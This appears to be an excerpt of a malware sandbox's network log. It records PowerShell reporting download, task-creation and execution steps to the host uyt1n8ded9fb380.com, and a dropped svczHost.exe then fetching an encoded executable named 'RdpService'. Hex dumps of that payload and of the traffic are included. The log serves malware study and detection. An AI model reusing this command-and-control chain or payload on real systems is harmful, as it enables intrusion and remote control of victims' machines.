                                                                                  2024-11-08 09:41:20 UTC516INData Raw: 49 8a d1 e8 a7 c8 25 01 49 8c 04 76 57 90 01 49 8a 01 49 8c 0c 5c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c8 25 01 49 8c 04 5e 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c8 25 01 49 8c 04 46 57 90 01 49 8a 01 49 8c 0c 2c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 14 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c8 25 01 49 8c 04 26 57 90 01 49 8a 01 49 8c 0c 2c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c9 25 01 49 8c 04 0e 57 90 01 49 8a 01 49 8c 0c 14 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c9 25 01 49 8c 04 f6 54 90 01 49 8a 01 49 8c 0c fc cb 4f 01 49 82 38 01 74 00
                                                                                  Data Ascii: I%IvWII\OI8tI%I^WIIDOI8tIg%IFWII,OI8tIG%I6WIIOI8tI'%I6WIIDOI8tI%I&WII,OI8tI%IWIIOI8tI%ITIIOI8t
                                                                                  2024-11-08 09:41:20 UTC1369INData Raw: a7 c6 25 01 49 8c 04 96 54 90 01 49 8a 01 49 8c 0c ac cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c6 25 01 49 8c 04 86 54 90 01 49 8a 01 49 8c 0c 9c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c6 25 01 49 8c 04 76 54 90 01 49 8a 01 49 8c 0c 84 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c6 25 01 49 8c 04 66 54 90 01 49 8a 01 49 8c 0c 6c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c6 25 01 49 8c 04 4e 54 90 01 49 8a 01 49 8c 0c 54 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c6 25 01 49 8c 04 36 54 90 01 49 8a 01 49 8c 0c 3c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c7 25 01 49 8c 04 26 54 90 01 49 8a 01 49 8c 0c 24 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c7 25 01 49 8c 04 0e 54 90 01 49 8a 01 49 8c 0c 0c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1
                                                                                  Data Ascii: %ITIIOI8tI%ITIIOI8tIg%IvTIIOI8tIG%IfTIIlOI8tI'%INTIITOI8tI%I6TII<OI8tI%I&TII$OI8tI%ITIIOI8tI
                                                                                  2024-11-08 09:41:20 UTC1369INData Raw: 74 00 c2 49 8a d1 e8 47 c3 25 01 49 8c 04 be 53 90 01 49 8a 01 49 8c 0c 44 c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c3 25 01 49 8c 04 a6 53 90 01 49 8a 01 49 8c 0c 2c c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c3 25 01 49 8c 04 8e 53 90 01 49 8a 01 49 8c 0c 14 c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c0 25 01 49 8c 04 76 53 90 01 49 8a 01 49 8c 0c fc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c0 25 01 49 8c 04 5e 53 90 01 49 8a 01 49 8c 0c e4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c0 25 01 49 8c 04 46 53 90 01 49 8a 01 49 8c 0c cc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c0 25 01 49 8c 04 2e 53 90 01 49 8a 01 49 8c 0c bc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c0 25 01 49 8c 04 16 53 90 01 49 8a 01 49 8c 0c ac c7 4f 01 49 82 38
                                                                                  Data Ascii: tIG%ISIIDOI8tI'%ISII,OI8tI%ISIIOI8tI%IvSIIOI8tI%I^SIIOI8tI%IFSIIOI8tI%I.SIIOI8tIg%ISIIOI8
                                                                                  2024-11-08 09:41:20 UTC1369INData Raw: c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 bd 25 01 49 8c 04 ce 4e 90 01 49 8a 01 49 8c 0c a4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 bd 25 01 49 8c 04 c6 4e 90 01 49 8a 01 49 8c 0c 8c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 bd 25 01 49 8c 04 b6 4e 90 01 49 8a 01 49 8c 0c 7c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 bd 25 01 49 8c 04 ae 4e 90 01 49 8a 01 49 8c 0c 64 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 bd 25 01 49 8c 04 9e 4e 90 01 49 8a 01 49 8c 0c 4c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 bd 25 01 49 8c 04 96 4e 90 01 49 8a 01 49 8c 0c 34 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 bd 25 01 49 8c 04 7e 4e 90 01 49 8a 01 49 8c 0c 1c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 bd 25 01 49 8c 04 66 4e 90 01 49 8a 01 49 8c 0c
                                                                                  Data Ascii: OI8tI%INIIOI8tI%INIIOI8tI%INII|OI8tI%INIIdOI8tIg%INIILOI8tIG%INII4OI8tI'%I~NIIOI8tI%IfNII
                                                                                  2024-11-08 09:41:20 UTC1369INData Raw: 49 8a 01 49 8c 0c 6c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b6 25 01 49 8c 04 a6 4f 90 01 49 8a 01 49 8c 0c 5c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b6 25 01 49 8c 04 8e 4f 90 01 49 8a 01 49 8c 0c 4c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b6 25 01 49 8c 04 7e 4f 90 01 49 8a 01 49 8c 0c 34 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b6 25 01 49 8c 04 76 4f 90 01 49 8a 01 49 8c 0c 1c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b6 25 01 49 8c 04 6e 4f 90 01 49 8a 01 49 8c 0c 04 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b7 25 01 49 8c 04 56 4f 90 01 49 8a 01 49 8c 0c ec c3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b7 25 01 49 8c 04 3e 4f 90 01 49 8a 01 49 8c 0c d4 c3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b7 25 01 49 8c 04 36 4f 90
                                                                                  Data Ascii: IIlOI8tI%IOII\OI8tIg%IOIILOI8tIG%I~OII4OI8tI'%IvOIIOI8tI%InOIIOI8tI%IVOIIOI8tI%I>OIIOI8tI%I6O
                                                                                  2024-11-08 09:41:20 UTC316INData Raw: 49 8c 04 76 4a 90 01 49 8a 01 49 8c 0c e4 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b3 25 01 49 8c 04 5e 4a 90 01 49 8a 01 49 8c 0c cc be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b3 25 01 49 8c 04 46 4a 90 01 49 8a 01 49 8c 0c b4 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b0 25 01 49 8c 04 2e 4a 90 01 49 8a 01 49 8c 0c 9c be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b0 25 01 49 8c 04 1e 4a 90 01 49 8a 01 49 8c 0c 84 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b0 25 01 49 8c 04 06 4a 90 01 49 8a 01 49 8c 0c 94 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b0 25 01 49 8c 04 ee 4b 90 01 49 8a 01 49 8c 0c 7c be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b0 25 01 49 8c 04 fe 4b 90 01 49 8a 01 49 8c 0c 64 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b0 25
                                                                                  Data Ascii: IvJIIOI8tI'%I^JIIOI8tI%IFJIIOI8tI%I.JIIOI8tI%IJIIOI8tI%IJIIOI8tI%IKII|OI8tIg%IKIIdOI8tIG%


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.11.2049734104.21.86.2194433372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:41:30 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118677f201494fef54afd7d17ea9687f9c9 HTTP/1.1
                                                                                  Content-Type: application/json
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  Content-Length: 200
                                                                                  2024-11-08 09:41:30 UTC200OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 63 6f 6d 70 6c 65 74 65 64 3a 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 54 68 65 20 66 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 20 77 61 73 20 70 72 6f 63 65 73 73 65 64 20 61 6e 64 20 73 61 76 65 64 20 61 73 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 73 76 63 7a 48 6f 73 74 2e 65 78 65 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                  Data Ascii: [ "\"Download completed: C:\\\\Windows\\\\Temp\\\\file\"", "\"The file C:\\\\Windows\\\\Temp\\\\file was processed and saved as C:\\\\Windows\\\\Temp\\\\svczHost.exe\"", "----------"]
                                                                                  2024-11-08 09:41:31 UTC934INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:41:31 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yHsJ04GK68d1Ww7uLALjGMvdaUvp%2FPjquW7xoEkjy9Neic%2FFjYfxK2A538Dyv3WNKfXFxrcddGu8c38Tj12ujl8%2FbuNDpZTrhhzLabRhmVHIzo2NunCIxjHIXgsczOYRhZFy4OoTnq3L"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13209&sent=27&recv=33&lost=0&retrans=0&sent_bytes=5857&recv_bytes=20846&delivery_rate=2377850&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49b92d8688c1e-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102577&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1150&delivery_rate=37227&cwnd=252&unsent_bytes=0&cid=f10c30c7577a3e60&ts=815&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.11.2049735104.21.86.2194433372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:41:31 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118677f201494fef54afd7d17ea9687f9c9 HTTP/1.1
                                                                                  Content-Type: application/json
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  Content-Length: 97
                                                                                  2024-11-08 09:41:31 UTC97OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 65 74 65 6c 65 20 46 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 61 64 64 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                  Data Ascii: [ "\"Detele File C:\\\\Windows\\\\Temp\\\\file\"", "\"add task\"", "----------"]
                                                                                  2024-11-08 09:41:32 UTC936INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:41:32 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BU0CLJmVqfisYrvn4BF8Xi0XhCCpEjPQixWds2IRiXWdl0lkLjpzMS%2BAg9Tyvv0KDlgC69mWd4Ex6akwQODHHgHoM8bfA2A%2FRd5G7kptL0lexTT1VWZeaXKUyzQQspcKm50qSNNF%2BwHQ"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=21985&sent=32&recv=34&lost=0&retrans=0&sent_bytes=16115&recv_bytes=17196&delivery_rate=7053140&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49b99dc5e8113-ORD
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=123745&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1046&delivery_rate=30173&cwnd=33&unsent_bytes=0&cid=97834c58a9f44c3b&ts=871&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.11.2049736104.21.86.2194433372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:41:34 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118677f201494fef54afd7d17ea9687f9c9 HTTP/1.1
                                                                                  Content-Type: application/json
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  Content-Length: 64
                                                                                  2024-11-08 09:41:34 UTC64OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 65 74 20 74 68 75 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                  Data Ascii: [ "\"run task\"", "\"ket thuc\"", "----------"]
                                                                                  2024-11-08 09:41:35 UTC933INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:41:35 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vxOA3IlqqzSOALnCD9ijFvpCoaO9TgdP9iKZesWh1kzR%2BN9daHCmhy6KtHv8Z9bfCIDDXAvdwzvXyvFivsaSiuanW09RvmyTh3YKgD4A%2FZXPn9ThWeCwcuYALpzvut0UNEWYkQpQHpgy"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=19573&sent=60&recv=68&lost=0&retrans=0&sent_bytes=21477&recv_bytes=43797&delivery_rate=7053140&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49baaebc84340-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102091&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1013&delivery_rate=37466&cwnd=245&unsent_bytes=0&cid=431fc227b63da5a2&ts=830&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.11.2049738104.21.86.2194439104C:\Windows\Temp\svczHost.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:42:15 UTC68OUTGET /StaticFile/RdpService/2 HTTP/1.1
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  2024-11-08 09:42:16 UTC1098INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:42:16 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 9427456
                                                                                  Connection: close
                                                                                  content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                  hash: F651568CD1F1A7ABAEDD4389DA3A2F14
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rbEizj1QV6LNEoHqlWRWisFEYoGwxGYQo%2FuX03RWQrcQOuZsPlcXtE%2FOHkrBkQQcbY9rJf2ugh2Qhlrdt5VP36%2BD%2BI8b9%2BgSnYPv45GiOL7qKzEUzwLwFJPRx5%2FSUQ4mpvof3su9gk32"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=26718&sent=31&recv=35&lost=0&retrans=0&sent_bytes=8513&recv_bytes=19150&delivery_rate=2439431&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49caedab61899-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102402&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=706&delivery_rate=37361&cwnd=252&unsent_bytes=0&cid=3fd7630895a4beaf&ts=910&x=0"
                                                                                  2024-11-08 09:42:16 UTC271INData Raw: 4f 58 92 02 01 02 02 02 06 02 02 02 fd fd 02 02 ba 02 02 02 02 02 02 02 42 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 03 02 02 0c 1d b8 0c 02 b6 0b cf 23 ba 03 4e cf 23 56 6a 6b 71 22 72 70 6d 65 70 63 6f 22 61 63 6c 6c 6d 76 22 60 67 22 70 77 6c 22 6b 6c 22 46 4d 51 22 6f 6d 66 67 2c 0f 0f 08 26 02 02 02 02 02 02 02 ec ef 34 22 a8 8e 5a 71 a8 8e 5a 71 a8 8e 5a 71 a1 f6 c9 71 a6 8e 5a 71 d8 0f 5b 70 bf 8e 5a 71 a8 8e 5b 71 2e 8f 5a 71 b8 0a 59 70 bb 8e 5a 71 b8 0a 5e 70 91 8e 5a 71 e0 0b 5f 70 ab 8e 5a 71 d8 0f 5e 70 aa 8e 5a 71 a8 8e 5a 71 a9 8e 5a 71 b8 0a 5f 70 de 8e 5a 71 e0 0b 5a 70 a9 8e 5a 71 e0 0b 58 70 a9 8e 5a 71 50 6b 61 6a a8 8e 5a 71 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02
                                                                                  Data Ascii: OXB#N#Vjkq"rpmepco"acllmv"`g"pwl"kl"FMQ"omfg,&4"ZqZqZqqZq[pZq[q.ZqYpZq^pZq_pZq^pZqZqZq_pZqZpZqXpZqPkajZq
                                                                                  2024-11-08 09:42:16 UTC1369INData Raw: 02 02 02 02 02 f2 02 20 02 09 00 0c 2b 02 38 52 02 02 92 43 02 02 18 1e 02 9a d3 09 02 02 12 02 02 02 02 02 42 03 02 02 02 02 12 02 02 02 00 02 02 04 02 02 02 02 02 02 02 04 02 02 02 02 02 02 02 02 42 ac 02 02 06 02 02 02 02 02 02 01 02 62 83 02 02 12 02 02 02 02 02 02 12 02 02 02 02 02 02 02 02 12 02 02 02 02 02 02 12 02 02 02 02 02 02 02 02 02 02 12 02 02 02 02 c4 a7 02 0a 00 02 02 0a ca a7 02 7e 03 02 02 02 12 ac 02 b0 07 02 02 02 82 aa 02 ca 84 07 02 02 02 02 02 02 02 02 02 02 22 ac 02 4e 16 02 02 92 ae 9b 02 1e 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 82 ac 9b 02 2a 02 02 02 52 a9 9b 02 42 03 02 02 02 02 02 02 02 02 02 02 02 82 6e 02 c2 09 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 2c 76 67 7a 76 02
                                                                                  Data Ascii: +8RCBBb~"N*RBn,vgzv
                                                                                  2024-11-08 09:42:16 UTC1369INData Raw: 4a 8f 0f e3 8c 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb c0 d6 2a 02 4a 8f 07 49 8d 5a 02 4a 8f 0f 3e 8d 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb a7 d6 2a 02 4a 8f 07 3c 8d 5a 02 4a 8f 0f 2d 8d 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 8a d6 2a 02 4a 8f 07 33 8d 5a 02 4a 8f 0f 20 8d 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 69 d6 2a 02 4a 8f 07 26 8d 5a 02 4a 8f 0f 17 8d 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 4c d6 2a 02 4a 8f 07 15 8d 5a 02 4a 8f 0f 0a 8d 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 33 d6 2a 02 4a 8f 07 08 8d 5a 02 4a 8f 0f f9 8c 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 16 d6 2a 02 4a 8f 07 ff 8c 5a 02 4a 8f 0f ec 8c 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb f5 d1 2a 02 4a 8f 07 1a 8d 5a 02 4a 8f 0f 0b 8d 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb d8 d1 2a 02 4a
                                                                                  Data Ascii: JZJ;wJ*JIZJ>ZJ;wJ*J<ZJ-ZJ;wJ*J3ZJ ZJ;wJi*J&ZJZJ;wJL*JZJZJ;wJ3*JZJZJ;wJ*JZJZJ;wJ*JZJZJ;wJ*J
                                                                                  2024-11-08 09:42:16 UTC1369INData Raw: 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 6d cd 2a 02 4a 8f 07 9a 93 5a 02 4a 8f 0f 8b 93 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 50 cd 2a 02 4a 8f 07 89 93 5a 02 4a 8f 0f 7e 93 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 37 cd 2a 02 4a 8f 07 7c 93 5a 02 4a 8f 0f 6d 93 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 1a cd 2a 02 4a 8f 07 7b 93 5a 02 4a 8f 0f 68 93 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb f9 cc 2a 02 4a 8f 07 76 93 5a 02 4a 8f 0f 67 93 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb dc cc 2a 02 4a 8f 07 ed 93 5a 02 4a 8f 0f e2 93 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb c3 cc 2a 02 4a 8f 07 e8 93 5a 02 4a 8f 0f d9 93 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb a6 cc 2a 02 4a 8f 07 e7 93 5a 02 4a 8f 0f d4 93 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 85 cc 2a 02 4a 8f 07 2a 90 5a 02
                                                                                  Data Ascii: J;wJm*JZJZJ;wJP*JZJ~ZJ;wJ7*J|ZJmZJ;wJ*J{ZJhZJ;wJ*JvZJgZJ;wJ*JZJZJ;wJ*JZJZJ;wJ*JZJZJ;wJ*J*Z
                                                                                  2024-11-08 09:42:16 UTC516INData Raw: 0d a4 02 4a 89 02 4a 8f 0f 53 80 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb e8 cb 2a 02 4a 8f 07 59 0d a4 02 4a 89 02 4a 8f 0f 3b 80 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb c8 cb 2a 02 4a 8f 07 79 0d a4 02 4a 89 02 4a 8f 0f 3b 80 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb a8 cb 2a 02 4a 8f 07 61 0d a4 02 4a 89 02 4a 8f 0f 23 80 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 88 cb 2a 02 4a 8f 07 49 0d a4 02 4a 89 02 4a 8f 0f 3b 80 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 68 cb 2a 02 4a 8f 07 41 0d a4 02 4a 89 02 4a 8f 0f 53 80 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 48 cb 2a 02 4a 8f 07 29 0d a4 02 4a 89 02 4a 8f 0f 3b 80 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 28 cb 2a 02 4a 8f 07 19 0d a4 02 4a 89 02 4a 8f 0f 33 80 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 08 cb 2a 02 4a 8f 07
                                                                                  Data Ascii: JJSZJ;wJ*JYJJ;ZJ;wJ*JyJJ;ZJ;wJ*JaJJ#ZJ;wJ*JIJJ;ZJ;wJh*JAJJSZJ;wJH*J)JJ;ZJ;wJ(*JJJ3ZJ;wJ*J
                                                                                  2024-11-08 09:42:17 UTC1369INData Raw: 89 02 4a 8f 0f cb 83 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb e8 c5 2a 02 4a 8f 07 71 0c a4 02 4a 89 02 4a 8f 0f c3 83 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb c8 c5 2a 02 4a 8f 07 79 0c a4 02 4a 89 02 4a 8f 0f c3 83 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb a8 c5 2a 02 4a 8f 07 61 0c a4 02 4a 89 02 4a 8f 0f b3 83 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 88 c5 2a 02 4a 8f 07 61 0c a4 02 4a 89 02 4a 8f 0f 93 80 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 68 c5 2a 02 4a 8f 07 49 0c a4 02 4a 89 02 4a 8f 0f 7b 80 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 48 c5 2a 02 4a 8f 07 31 0c a4 02 4a 89 02 4a 8f 0f 63 80 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 28 c5 2a 02 4a 8f 07 19 0c a4 02 4a 89 02 4a 8f 0f 4b 80 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 08 c5 2a 02 4a 8f 07 09 0c a4 02
                                                                                  Data Ascii: JZJ;wJ*JqJJZJ;wJ*JyJJZJ;wJ*JaJJZJ;wJ*JaJJZJ;wJh*JIJJ{ZJ;wJH*J1JJcZJ;wJ(*JJJKZJ;wJ*J
                                                                                  2024-11-08 09:42:17 UTC1369INData Raw: 8f 07 d9 09 a4 02 4a 89 02 4a 8f 0f fb 7d 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 88 c0 2a 02 4a 8f 07 c9 09 a4 02 4a 89 02 4a 8f 0f e3 7d 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 68 c0 2a 02 4a 8f 07 b1 09 a4 02 4a 89 02 4a 8f 0f cb 7d 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 48 c0 2a 02 4a 8f 07 99 09 a4 02 4a 89 02 4a 8f 0f b3 7d 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 28 c0 2a 02 4a 8f 07 81 09 a4 02 4a 89 02 4a 8f 0f 9b 7d 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 08 c0 2a 02 4a 8f 07 69 09 a4 02 4a 89 02 4a 8f 0f 83 7d 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb e8 c3 2a 02 4a 8f 07 61 09 a4 02 4a 89 02 4a 8f 0f 83 7d 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb c8 c3 2a 02 4a 8f 07 49 09 a4 02 4a 89 02 4a 8f 0f 6b 7d 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb a8 c3 2a 02
